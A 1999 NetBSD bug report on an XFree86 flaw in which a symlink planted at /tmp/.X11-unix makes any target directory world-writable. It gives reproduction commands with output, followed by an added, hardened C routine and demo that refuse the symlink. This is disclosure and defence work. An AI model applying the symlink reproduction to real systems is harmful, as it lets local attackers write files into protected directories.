Subject: xsrc/7281: XFree86 and /tmp/.X11-unix permissions
To: None <gnats-bugs@gnats.netbsd.org>
From: Hubert Feyrer <feyrer@rfhs8012.fh-regensburg.de>
List: netbsd-bugs
Date: 03/29/1999 19:24:14
>Number: 7281
>Category: xsrc
>Synopsis: XFree86 and /tmp/.X11-unix permissions
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: gnats-admin (GNATS administrator)
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Mar 29 09:35:01 1999
>Last-Modified:
>Originator: Hubert Feyrer
>Organization:
Hubert Feyrer <hubertf@channel.regensburg.org>
>Release: <10 days old
>Environment:
System: NetBSD rfhpc8002 1.3K NetBSD 1.3K (YUI) #13: Tue Mar 23 13:13:06 MET 1999 feyrer@rfhpc8002:/usr/cvs/src/sys/arch/i386/compile/YUI i386
>Description:
From Freshmeat.net:
A new vulnerability has been found in XFree86. XFree86 creates a directory
in /tmp with the name .X11-unix for the X sockets and sets the directory to
mode 1777. If an attacker creates a symlink with that filename and points
it to another directory (e.g. /root), the permissions of the target directory are
set to 1777, thus a local attacker may create files with any contents in any
directory. The original SuSe security is available at the Bugtraq archive.
Updated packages for SuSe Linux are available on the SuSe FTP Server.
The bugtraq entry is at http://www.geek-girl.com/bugtraq/1999_1/1138.html
>How-To-Repeat:
cd /tmp
install -dm 700 -o root secretdir
ls -dla /tmp/secretdir
-> drwx------ 2 root wheel 512 Mar 29 19:17 secretdir
ln -s secretdir .X11-unix
XF86_3DLabs (chosen at random)
ls -dla /tmp/secretdir
-> drwxrwxrwt 2 root wheel 512 Mar 29 19:17 /tmp/secretdir
>Fix:
Unknown.
>Audit-Trail:
>Unformatted:
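
Added example, not part of the original report and not XFree86's own code: one way a server could create its socket directory so that a planted symlink, as in How-To-Repeat, is refused instead of followed. The function names and the demo's temporary paths are hypothetical, and the ownership check assumes the directory should belong to the calling user.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create `path` as a mode-1777 directory without following a symlink.
 * Returns 0 on success, -1 if `path` is not a real directory we own. */
int safe_socket_dir(const char *path)
{
    struct stat st;
    int fd;
    if (mkdir(path, 0755) == -1 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW: open() fails if the final path component is a symlink. */
    fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd == -1)
        return -1;
    /* Inspect the object actually opened and chmod it via the descriptor,
     * so the name cannot be swapped between the check and the chmod. */
    if (fstat(fd, &st) == -1 || !S_ISDIR(st.st_mode) ||
        st.st_uid != geteuid() || fchmod(fd, 01777) == -1) {
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

/* Constructed demo: plant .X11-unix as a symlink to a 0700 directory and
 * return that directory's permission bits after the hardened call. */
int demo_target_mode_after_symlink(void)
{
    char base[] = "/tmp/x11demo.XXXXXX", target[64], path[64];
    struct stat st;
    if (mkdtemp(base) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/secretdir", base);
    snprintf(path, sizeof path, "%s/.X11-unix", base);
    if (mkdir(target, 0700) == -1 || chmod(target, 0700) == -1 ||
        symlink("secretdir", path) == -1)
        return -1;
    if (safe_socket_dir(path) == 0)          /* the symlink must be refused */
        return -2;
    snprintf(path, sizeof path, "%s/fresh", base);
    if (safe_socket_dir(path) != 0 || stat(path, &st) == -1 || (st.st_mode & 07777) != 01777)
        return -3;                           /* a fresh path must end up 1777 */
    return stat(target, &st) == -1 ? -1 : (int)(st.st_mode & 07777);
}
```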